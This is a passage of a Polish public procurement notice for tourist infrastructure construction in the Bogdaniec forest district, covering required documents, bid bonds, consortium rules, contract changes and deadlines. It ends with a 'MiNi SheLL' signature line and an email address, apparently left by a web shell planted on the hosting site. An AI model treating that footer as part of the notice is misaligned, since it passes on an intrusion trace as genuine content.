SWZ.<br/>Oświadczenia, o których mowa wyżej stanowią dowód potwierdzający brak podstaw wykluczenia oraz<br/>spełnienie warunków udziału w postępowaniu, na dzień składania ofert, tymczasowo zastępujący<br/>wymagane przez Zamawiającego podmiotowe środki dowodowe. Oświadczenia te składa się, pod<br/>rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia, Zamawiający wezwie Wykonawcę, którego<br/>oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia<br/>wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>a) informacji z Krajowego Rejestru Karnego w zakresie:(a) art. 108 ust. 1 pkt 1 i 2 PZP,(b) art. 108 ust.<br/>1 pkt 4 PZP, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>karnego – sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem,<br/>b) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej<br/>grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów<br/>(tekst jedn. Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę lub ofertę<br/>częściową, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami<br/>lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego<br/>Wykonawcy należącego do tej samej grupy kapitałowej - (wzór oświadczenia Wykonawcy w zakresie<br/>art. 108 ust. 1 pkt 5 PZP o przynależności lub braku przynależności do tej samej grupy kapitałowej<br/>stanowi załącznik nr 6 do SWZ),<br/>c) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie<br/>zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1) PZP, wystawionego nie<br/>wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłaceniem podatków lub<br/>opłat wraz z zaświadczeniem, Zamawiający żąda złożenia dokumentów potwierdzających, że przed<br/>upływem terminu składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz z<br/>odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności,<br/>d) zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu<br/>Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej<br/>Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z<br/>opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1) PZP,<br/>wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z<br/>opłaceniem składek na ubezpieczenie społeczne lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem Zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu<br/>składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub<br/>zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności,<br/>e) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) PZP, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>f) oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 PZP, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o<br/>których mowa w: a) art. 108 ust. 1 pkt 3 PZP, b) art. 108 ust. 1 pkt 4 PZP, dotyczących orzeczenia<br/>zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, c) art. 108 ust. 1 pkt 5<br/>PZP, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie<br/>konkurencji, d) art. 108 ust. 1 pkt 6 PZP, e) art. 109 ust. 1 pkt 1 PZP, odnośnie do naruszenia<br/>obowiązków dotyczących płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia 12<br/>stycznia 1991 r. o podatkach i opłatach lokalnych (tekst jedn. Dz. U. z 2019 r. poz. 1170 z późn. zm.) ,<br/>f) art. 109 ust. 8 i 10 PZP - (wzór oświadczenia o aktualności informacji zawartych w oświadczeniu, o<br/>którym mowa w art. 125 ust. 1 PZP w zakresie podstaw wykluczenia z postępowania stanowi załącznik<br/>nr 8 do SWZ).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od Wykonawców przedłożenia przedmiotowych środków<br/>dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w wysokości:<br/>Ogłoszenie nr 2021/BZP 00140401/01 z dnia 2021-08-07<br/>2021-08-07 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>Dla części nr 1 – 500,00 zł<br/>Dla części nr 2 – 1500,00 zł<br/>Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do<br/>dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1<br/>pkt 2 i 3 oraz ust. 2 PZP.<br/>11.2. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących<br/>formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.:<br/>Dz. U. z 2020 r. poz. 299).<br/>Zamawiającego w banku BNP PARIBAS nr rachunku: 84 2030 0045 1110 0000 0095 2200 z<br/>dopiskiem: wadium na zabezpieczenie oferty w postępowaniu na „Budowa infrastruktury<br/>turystycznej na terenie Nadleśnictwa Bogdaniec – Część nr …..”,. Wniesienie wadium w<br/>pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie zaliczone na rachunku<br/>bankowym Zamawiającego. Wadium wniesione w pieniądzu Zamawiający przechowuje na<br/>rachunku bankowym.<br/>Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub<br/>poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9<br/>listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości powinno wynikać<br/>bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez Zamawiającego w terminie<br/>związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w<br/>okolicznościach określonych w art. 98 ust. 6 PZP.<br/>Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 11.2. ppkt 2)-4)<br/>należy przekazać Zamawiającemu wraz z Ofertą w oryginale w postaci elektronicznej tj.<br/>opatrzonej kwalifikowanym podpisem elektronicznym osób upoważnionych do jego wystawienia.<br/>Wadium musi zabezpieczać ofertę na daną część zamówienia przez cały okres związania<br/>ofertą. Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób<br/>nieprawidłowy, lub nie będzie utrzymywał wadium nieprzerwanie do upływu terminu związania<br/>ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP<br/>zostanie odrzucona z postępowania na podstawie art. 226 ust. 1 pkt 14 PZP w zw. z art. 266<br/>PZP.<br/>Treść gwarancji wadialnej musi zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego),<br/>gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz<br/>wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem – określenie<br/>przedmiotu zamówienia<br/>3) kwotę gwarancji/poręczenia,<br/>4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie kwoty<br/>gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego w okolicznościach<br/>określonych w art. 98 ust. 6 PZP.<br/>Zamawiający zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 - 5 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(konsorcjum):<br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać<br/>umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa<br/>załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania;<br/>3) Oświadczenia, o których mowa w art. 125 ust. 1 PZP, tj. oświadczenie o spełnieniu warunków<br/>udziału w postępowaniu (wg wzoru stanowiącego załącznik nr 3A do SWZ) oraz oświadczenie o<br/>braku podstaw do wykluczenia (wg wzoru stanowiącego załącznik nr 3B do SWZ) składa każdy<br/>z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu. Oświadczenia Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, o których mowa wyżej powinny zostać złożone wraz z<br/>ofertą pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym.<br/>4) dokumenty, o których mowa w pkt 9.3. obowiązany będzie złożyć każdy z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia<br/>5) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić<br/>odpowiedzialność solidarną za wykonanie umowy;<br/>6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie<br/>Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań, otrzymywania<br/>poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów;<br/>7) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w<br/>całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia łącznie lub każdego z osobna.<br/>8) Zamawiający informuje o treści przepisu art. 117 ust. 3 PZP, zgodnie z którym w odniesieniu<br/>do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach<br/>tych z Wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są<br/>wymagane.<br/>W związku z powyższym Wykonawca zgodnie z art. 117 ust. 4 PZP zobowiązany jest załączyć<br/>do oferty podmiotowy środek dowodowy w postaci oświadczenia, z którego wynika, które roboty<br/>budowlane wykonają poszczególni Wykonawcy.<br/>Wzór stosownego oświadczenia został zawarty w formularzu Oferty stanowiącym załącznik nr 2<br/>SWZ i Zamawiający zaleca złożyć to oświadczenie właśnie w tym formularzu.<br/>Obowiązek złożenia oświadczenia, o którym mowa w art. 117 ust. 4 PZP odnosi się również do<br/>Wykonawców, prowadzących działalność w formie spółki cywilnej.<br/>W przypadku Wykonawców wykonujących działalność w formie spółki cywilnej postanowienia<br/>dot. oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum)<br/>stosuje się odpowiednio, z zastrzeżeniem, że do odpowiedzi na wezwanie Zamawiającego do<br/>złożenia dokumentów, o którym mowa w pkt 9.3.SWZ należy załączyć (1) zaświadczenie<br/>właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z<br/>opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1) PZP, wystawione nie wcześniej<br/>niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłaceniem podatków lub opłat<br/>wraz z zaświadczeniem, <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> zmiany Umowy:<br/>(1) w zakresie zmiany terminów realizacji poszczególnych robót określonych Harmonogramie<br/>oraz Terminu Wykonania, stosownie do przypadku:<br/>(a) o czas opóźnienia Zamawiającego w wykonywaniu jego obowiązków wynikających z Umowy,<br/>w tym w szczególności w zakresie obowiązku wydania Terenu Budowy oraz obowiązku<br/>dokonania odbioru, gdyby odbiór taki w pierwotnie założonym terminie był utrudniony lub<br/>niemożliwy, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie Przedmiotu<br/>Umowy lub jakiejkolwiek jego części;<br/>(b) o czas działania Siły Wyższej oraz o czas niezbędny do usunięcia jej skutków i następstw,<br/>(c) w przypadku zmiany powszechnie obowiązujących przepisów prawa, regulujących zasady<br/>wykonywania Przedmiotu Umowy o czas niezbędny do dostosowania wykonania Przedmiotu<br/>Umowy lub jego części do zmienionego stanu prawnego,<br/>(d) o czas opóźnienia w wykonaniu przez podmioty zewnętrzne czynności koniecznych do<br/>wykonania Przedmiotu Umowy z zastrzeżeniem, że przyczyną opóźnienia nie są działania lub<br/>zaniechania Wykonawcy<br/>(e) o czas, kiedy realizacja Przedmiotu Umowy była niemożliwa oraz następstw tego zdarzenia<br/>w przypadku napotkania przez Wykonawcę lub Zamawiającego okoliczności niemożliwych do<br/>przewidzenia i niezależnych od nich,<br/>(f) o czas niezbędny do wykonania czynności wynikających z zaleceń właściwych organów jeżeli<br/>wykonywanie Przedmiotu Umowy zostało wstrzymane przez właściwe organy z przyczyn<br/>niezależnych od Wykonawcy, co uniemożliwia terminowe zakończenie realizacji Przedmiotu<br/>Umowy,<br/>g) o czas wynikający z konieczności ewentualnej zmiany zakresu Przedmiotu Umowy<br/>wprowadzonej na podstawie przepisów PZP umożliwiających dokonanie takiej zmiany,<br/>- przy czym każda zmiana może nastąpić tylko o czas niezbędny do wykonania Przedmiotu<br/>Umowy lub jego części, nie dłużej jednak niż o okres trwania okoliczności będących podstawą<br/>zmiany oraz ich następstw.<br/>(2) w zakresie zmiany kolejności wykonywania lub zmiany terminów wykonania poszczególnych<br/>świadczeń wchodzących w skład Przedmiotu Umowy w stosunku do terminów określonych w<br/>Harmonogramie jednakże bez dokonywania zmiany Terminu Wykonania. Przedmiotowa zmiana<br/>będzie mogła być wprowadzona w szczególności w przypadku zaistnienia okoliczności<br/>wskazanych w pkt (1).<br/>(3) w zakresie zmiany sposobu wykonania Przedmiotu Umowy związanej z koniecznością<br/>zrealizowania Przedmiotu Umowy przy zastosowaniu innych rozwiązań technicznych lub<br/>technologicznych, w szczególności robót zamiennych, gdy wystąpi co najmniej jedna z<br/>okoliczności:<br/>(a) wystąpi zmiana prawa mająca wpływ na realizację Przedmiotu Umowy,<br/>(b) w sytuacji, gdyby zastosowanie przewidzianych pierwotnie rozwiązań groziło niewykonaniem<br/>lub wadliwym wykonaniem Przedmiotu Umowy,<br/>(c) w przypadku, gdy na rynku pojawią się nowsze zamienniki zaoferowanych elementów<br/>Przedmiotu Umowy a uzyskanie elementów zaoferowanych przez Wykonawcę będzie bardzo<br/>utrudnione;<br/>(d) jak również w przypadku wystąpienia okoliczności, o których mowa w pkt (1) i (2) powyżej.<br/>- z zastrzeżeniem, że inne rozwiązania techniczne będą spełniały wymagania funkcjonalne<br/>określone w Dokumentacji Projektowej w stopniu nie mniejszym niż rozwiązania dotychczasowe.<br/>(4) W zakresie zmiany Wynagrodzenia, w przypadku, gdy zmiany, o których mowa w pkt (3)<br/>będą miały wpływ na koszty wykonania Przedmiotu Umowy przez Wykonawcę. Ustalenie<br/>zmienionej kwoty Wynagrodzenia odbywać się będzie w oparciu o:<br/>(a) w odniesieniu obniżenia Wynagrodzenia w związku z zaniechaniem wykonywania świadczeń<br/>wchodzących w skład Przedmiotu Umowy – w oparciu o ceny wskazane w Uproszczonym<br/>Kosztorysie Ofertowym;<br/>(b) w odniesieniu do zwiększenia Wynagrodzenia w następstwie zmiany, o których mowa w pkt<br/>(3) – w oparciu o ceny wskazane w Uproszczonym Kosztorysie Ofertowym lub na podstawie<br/>szczegółowej kalkulacji kosztorysowej Wykonawcy z zastrzeżeniem, iż zastosowanie do zmiany Umowy znajdzie wycena przedstawiająca najniższą wartość nowej stawki lub ceny. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">za pośrednictwem platformy Smart PZP (https://portal.smartpzp.pl/nadlesnictwo_bogdaniec</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-15 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com